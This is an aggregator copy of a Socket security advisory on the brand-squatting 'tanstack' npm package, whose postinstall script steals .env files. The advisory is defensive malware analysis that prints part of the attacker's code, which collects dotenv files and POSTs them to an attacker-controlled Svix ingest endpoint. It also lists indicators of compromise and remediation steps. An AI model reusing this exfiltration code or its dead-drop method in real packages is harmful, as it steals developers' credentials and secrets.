惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Apple Machine Learning Research
Apple Machine Learning Research
AWS News Blog
AWS News Blog
Google DeepMind News
Google DeepMind News
U
Unit 42
博客园 - 叶小钗
博客园 - 聂微东
GbyAI
GbyAI
Stack Overflow Blog
Stack Overflow Blog
有赞技术团队
有赞技术团队
aimingoo的专栏
aimingoo的专栏
D
DataBreaches.Net
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Jina AI
Jina AI
美团技术团队
The Cloudflare Blog
M
MIT News - Artificial intelligence
Microsoft Azure Blog
Microsoft Azure Blog
I
InfoQ
S
Schneier on Security
C
Check Point Blog
Project Zero
Project Zero
The Hacker News
The Hacker News
Scott Helme
Scott Helme
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
Cisco Talos Blog
Cisco Talos Blog
P
Privacy International News Feed
SecWiki News
SecWiki News
Latest news
Latest news
MongoDB | Blog
MongoDB | Blog
S
Secure Thoughts
Google Online Security Blog
Google Online Security Blog
F
Fortinet All Blogs
博客园 - 三生石上(FineUI控件)
H
Help Net Security
TaoSecurity Blog
TaoSecurity Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Last Week in AI
Last Week in AI
P
Privacy & Cybersecurity Law Blog
Forbes - Security
Forbes - Security
G
GRAHAM CLULEY
N
Netflix TechBlog - Medium
L
Lohrmann on Cybersecurity
A
About on SuperTechFans
T
The Exploit Database - CXSecurity.com
C
Cisco Blogs
PCI Perspectives
PCI Perspectives
大猫的无限游戏
大猫的无限游戏
T
Troy Hunt's Blog
H
Hacker News: Front Page
Vercel News
Vercel News

Socket

Next.js moves to scheduled security releases - Socket 11 Malicious NuGet Tools Pose as Game Cheats to Drop a Windo... Compromised npm Packages in the AsyncAPI Namespace Deliver M... jscrambler npm Package Compromised in Supply Chain Attack - ... Fake Braintree NuGet Package Skims Credit Cards and Harvests... Compromised Injective SDK npm Package Exfiltrates Wallet Key... npm v12 Ships With Install Scripts Off by Default, Begins De... Malicious Go Module Exposes GitHub Malware Lure Network Span... pnpm 11.10 Hardens Registry Authentication to Block Token Re... Coordinated npm and PyPI Campaign Typosquats Popular Secure ... Node.js Considers Public Workflow for Security Reports Amid ... PolinRider: North Korea-Linked Supply Chain Campaign Expands... Risky Biz Podcast: AI Agents Are Raising the Stakes for Soft... Chrome and Firefox Extensions Posing as Free VPNs Add Clipbo... Miasma Mini Shai-Hulud Hits ImmobiliareLabs npm Packages - S... Rolldown Pulls Rust React Compiler Integration After Binary ... Miasma Mini Shai-Hulud Hits LeoPlatform npm Packages and Git... Frontier AI Is Now Critical Infrastructure - Socket The Code You Didn't Write Is Still Yours to Defend - Socket GitHub Actions Checkout Now Blocks Risky pull_request_target... Introducing Repository Access Permissions and Custom Roles -... Socket MCP Adds Org Alerts, Threat Feed Review, and Package ... Socket Firewall Now Blocks Malicious VS Code and Open VSX Ex... 140+ Mastra npm Packages Compromised in Coordinated Supply C... npm Package Uses Prompt Injection and Token Flooding to Disr... Introducing Manifest Alerts - Socket GlassWASM: WebAssembly Malware Found in Trojanized Open VSX ... Socket for Linear Is Now Available - Socket US Government Forces Anthropic to Pull Claude Fable Days After Launch 152 Chrome Live Wallpaper Extensions Hid Ad Tracking and Faked Google Search Traffic Andrew Becherer Joins Socket as Chief Information Security Officer Socket Partners with Replit to Block Malicious Packages in AI-Powered Development npm Tooling Bug Incorrectly Marks One-Character Packages as Security Holders Mini Shai-Hulud, Miasma, and Hades Worms Target Bioinformatics and MCP Developers via Malicious PyPI Wheels Shai-Hulud Descends to Hades: Miasma Worm Campaign Spreads with New PyPI Wave RubyGems Adds Cooldown Feature to Bundler for Newly Published Gems RubyGems Adds Cooldown Feature to Bundler for Newly Published Gems pnpm 11.5 Adds Support for Recognizing npm Staged Publishes pnpm 11.5 Adds Support for Recognizing npm Staged Publishes Federal Audit Finds NIST Wasted Funds With No Plan to Clear NVD Backlog Federal Audit Finds NIST Wasted Funds With No Plan to Clear NVD Backlog Mini Shai-Hulud Campaign Hits Red Hat Cloud Services npm Packages Mini Shai-Hulud Campaign Hits Red Hat Cloud Services npm Packages Famous Chollima Targets PHP Developers Through Compromised Packagist Package Famous Chollima Targets PHP Developers Through Compromised Packagist Package Rust Moves to Restrict LLM Use in Contributions After Months of Internal Debate Rust Moves to Restrict LLM Use in Contributions After Months of Internal Debate Malicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and Passwords Malicious NuGet Package Impersonates Sicoob SDK to Exfiltrate Banking Certificates and Passwords Feross on TBPN: Socket's Series C and the State of Software Supply Chain Security Feross on TBPN: Socket's Series C and the State of Software Supply Chain Security OSV Withdraws 157 Malware Reports After Automated False Positives Hit npm and PyPI OSV Withdraws 157 Malware Reports After Automated False Positives Hit npm and PyPI TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages and Hundreds of Versions Across npm, PyPI, and Crates.io TrapDoor Crypto Stealer Supply Chain Attack Hits 34 Packages and Hundreds of Versions Across npm, PyPI, and Crates.io Laravel Lang Compromised with RCE Backdoor Across 700+ Versions Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects AI Has Taken Over Open Source npm Invalidates Granular Access Tokens as Mini Shai-Hulud Sweeps the Registry Coruna Respawned: Compromised art-template npm Package Leads to iOS Browser Exploit Kit Socket raises $60M Series C at $1B valuation led by Thrive Capital to secure AI-driven software development Socket Raises $60M Series C at a $1B Valuation to Help Enterprises Build Securely With AI Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor Active Supply Chain Attack Compromises @antv Packages on npm Popular node-ipc npm Package Infected with Credential Stealer TeamPCP and BreachForums Launch $1,000 Contest for Supply Chain Attacks Packagist Urges Immediate Composer Update After GitHub Actions Token Leak GemStuffer Campaign Abuses RubyGems as Exfiltration Channel Targeting UK Local Government Socket Named to Rising in Cyber 2026 List of Top Cybersecurity Startups TanStack npm Packages Compromised in Ongoing Mini Shai-Hulud Supply-Chain Attack fsnotify Maintainer Dispute Sparks Supply Chain Concerns Socket Releases Free Certified Patches for Critical vm2 Sandbox Escape 5 Malicious NuGet Packages Impersonate Chinese UI Libraries to Distribute Crypto Wallet and Credential Stealer pnpm 11 Adds Supply Chain Protection Defaults for Minimum Release Age and Exotic Subdependencies PyPI Fixes High-Severity Access Control Issues Found in Security Audit Malicious Ruby Gems and Go Modules Impersonate Developer Tools to Steal Secrets and Poison CI Mini Shai-Hulud Spreads to Packagist: Malicious Intercom PHP Package Follows npm Compromise Intercom’s npm Package Compromised in Ongoing Mini Shai-Hulud Worm Attack lightning PyPI Package Compromised in Supply Chain Attack SAP CAP npm Packages Hit by Supply Chain Attack Socket Has Acquired Secure Annex 73 Open VSX Sleeper Extensions Linked to GlassWorm Show New Malware Activations Introducing Reachability for PHP Introducing Data Exports Malicious Checkmarx Artifacts Found in Official KICS Docker Repository and Code Extensions Introducing Organization Notifications in Socket Introducing Reports: An Extensible Reporting Framework for Socket Data Socket for Jira Is Now Available Socket Named Top Sales Organization by RepVue NIST Officially Stops Enriching Most CVEs as Vulnerability Volume Skyrockets Socket Selected for OpenAI's Cybersecurity Grant Program Feross on the 10 Minutes or Less Podcast: Nobody Reads the Code 108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure Node.js Drops Bug Bounty Rewards After Funding Dries Up The Hidden Blast Radius of the Axios Compromise
Malicious npm Package Brand-Squats TanStack to Exfiltrate Environment Variables
Socket Resea · 2026-04-30 · via Socket

Sidebar CTA Background

Secure your dependencies with us

Socket proactively blocks malicious open source packages in your code.

Install

The Socket Research Team has detected an active supply-chain attack targeting the unscoped tanstack package on npm, a brand-squatted impersonation of the legitimate @tanstack/* organization. Beginning today, the package's maintainer (sh20raj) began pushing malicious versions that silently steal environment variable files, including .env, .env.local, and .env.production, from developers' machines at install time, exfiltrating them to an attacker-controlled endpoint.

Versions 2.0.4 through 2.0.7 are confirmed malicious. All four versions were published in rapid succession within a 27-minute window today and share the same exfiltration infrastructure, confirming this is a deliberate, planned attack rather than a gradual compromise.

Other Affected Packages

  • npm/portalapp@1.0.0 (Dependent)

Socket's threat detection identified the malicious postinstall behavior automatically. A full technical analysis is underway.

Discovery Source: Socket AI Detection

Timeline#

TanStack Maintainer Confirms Brand-Squatting#

It is unclear whether the maintainer account was compromised or whether the malicious changes were introduced by the maintainer directly. The package had existed for more than a month before versions 2.0.4 through 2.0.7 introduced postinstall behavior designed to exfiltrate environment files.

The package appears to be part of a broader brandjacking effort involving the TanStack name. In the npm context, the clearest issue is brand-squatting: publishing an unscoped tanstack package that could be mistaken for the legitimate @tanstack/* packages.

We spoke directly to Tanner Linsley, creator of TanStack, who confirmed that the maintainer of the unscoped tanstack package is not associated with TanStack or the official @tanstack/* projects in any way. Linsley said the package is not affiliated with TanStack, is unrelated to the official TanStack CLI despite being presented as such, and represents an ongoing brandjacking issue. He also said TanStack has filed legal documents related to a pending trademark infringement claim against the maintainer, that the maintainer previously demanded $10,000 from him, and that TanStack has repeatedly tried, unsuccessfully, to get npm to address the situation.

Compromised Packages and Versions#

  • 2.0.4: Exfiltrates .env + .env.local; disguised as sendReadme(); secondary postinstall.js, also exfiltrates README.md
  • 2.0.5: Exfiltrates README.md + AGENTS.md via postinstall
  • 2.0.6: Most aggressive: globs install root for .env and .env.* (incl. .env.production, .env.local, etc.) and POSTs all matches; fully silent
  • 2.0.7: Reverts to 2.0.4 pattern (.env + .env.local); all logs commented out; runs silently

Files Targeted

  • .env
  • .env.local
  • .env.production
  • .env.* (all dotenv variants, in v2.0.6)
  • README.md (v2.0.4, v2.0.5)
  • AGENTS.md (v2.0.5)

Postinstall Script Identifiers

  • postinstall.js with obfuscated function name sendReadme() (v2.0.4)
  • Secondary postinstall.js exfiltrating README.md (v2.0.4)
  • Silent execution with all console.log calls commented out (v2.0.7)

Malicious Code Snippet

const SVIX_URL =
  "https[://]api.svix[.]com/ingest/api/v1/source/src_3387PLMB2uhXOBe3Q8sHu/in/3j2jokvbaF4WWdngv8zBbk";

function collectEnvFiles() {
  const rootDir = path.resolve(__dirname, "..");
  const envFiles = {};

  try {
    const allFiles = fs.readdirSync(rootDir);
    const matches = allFiles.filter(
      (f) => f === ".env" || f.startsWith(".env.")
    );

    for (const file of matches) {
      try {
        envFiles[file] = fs.readFileSync(
          path.join(rootDir, file),
          "utf-8"
        );
      } catch {}
    }
  } catch {}

  return envFiles;
}

function sendReadme() {
  // if (
  //   process.env.TANSTACK_TELEMETRY_OPT_OUT === "1" ||
  //   process.env.TANSTACK_TELEMETRY_OPT_OUT === "true"
  // ) {
  //   return;
  // }

  const envFiles = collectEnvFiles();

  if (Object.keys(envFiles).length === 0) {
    return;
  }

  const payload = JSON.stringify({
    package: "tanstack",
    version: getVersion(),
    event: "postinstall",
    env: envFiles,
    timestamp: new Date().toISOString(),
    node: process.version,
    platform: process.platform,
    arch: process.arch,
  });

  const url = new URL(SVIX_URL);
  const options = {
    hostname: url.hostname,
    port: 443,
    path: url.pathname,
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      "Content-Length": Buffer.byteLength(payload),
    },
    timeout: 5000,
  };

First malicious version: 2.0.4 Last known malicious version: 2.0.7 (as of publication)

Note: The legitimate TanStack libraries are published under the @tanstack/* scope (e.g., @tanstack/react-query, @tanstack/router). The unscoped tanstack package is not affiliated with the official TanStack project.

The attacker set up a Svix source (src_3387PLMB2uhXOBe3Q8sHu), subscribed their own receiver to it, and then used the public ingest URL as a dead-drop: the malicious postinstall script POSTs stolen .env contents to that URL, and the attacker's backend quietly receives them.

The ingest URL is effectively a one-way drop box. Anyone with the URL can POST to it, but only the authenticated account holder can read what was received — so it's hard for defenders to probe or enumerate what was stolen.

The same Svix source ID appears across all four malicious versions, tying them to a single actor and a single controlled inbox.

  1. If you installed v2.0.4–2.0.7, uninstall and rotate your secrets now. Any .env, .env.local, or .env.production files present in your project directory at install time should be considered compromised. Rotate all API keys, tokens, database credentials, and secrets contained in those files immediately.
  2. Audit your dependencies. If tanstack (unscoped) appears anywhere in your package.json, package-lock.json, or yarn.lock files, remove it. The legitimate TanStack libraries are all published under the @tanstack/* scope.
  3. Block the package in your registry policies. Add tanstack (unscoped) to your organization's deny list or package firewall.
  4. Monitor for suspicious outbound traffic to api.svix.com from CI/CD pipelines, developer machines, and container build environments.

Indicators of Compromise#

Packages

npm/tanstack@2.0.4

npm/tanstack@2.0.5

npm/tanstack@2.0.6

npm/tanstack@2.0.7

npm Author

sh20raj

Trigger mechanism

postinstall npm lifecycle hook

Network

Svix Source ID src_3387PLMB2uhXOBe3Q8sHu

Exfiltration URL hxxps://api[.]svix[.]com/ingest/api/v1/source/src_3387PLMB2uhXOBe3Q8sHu/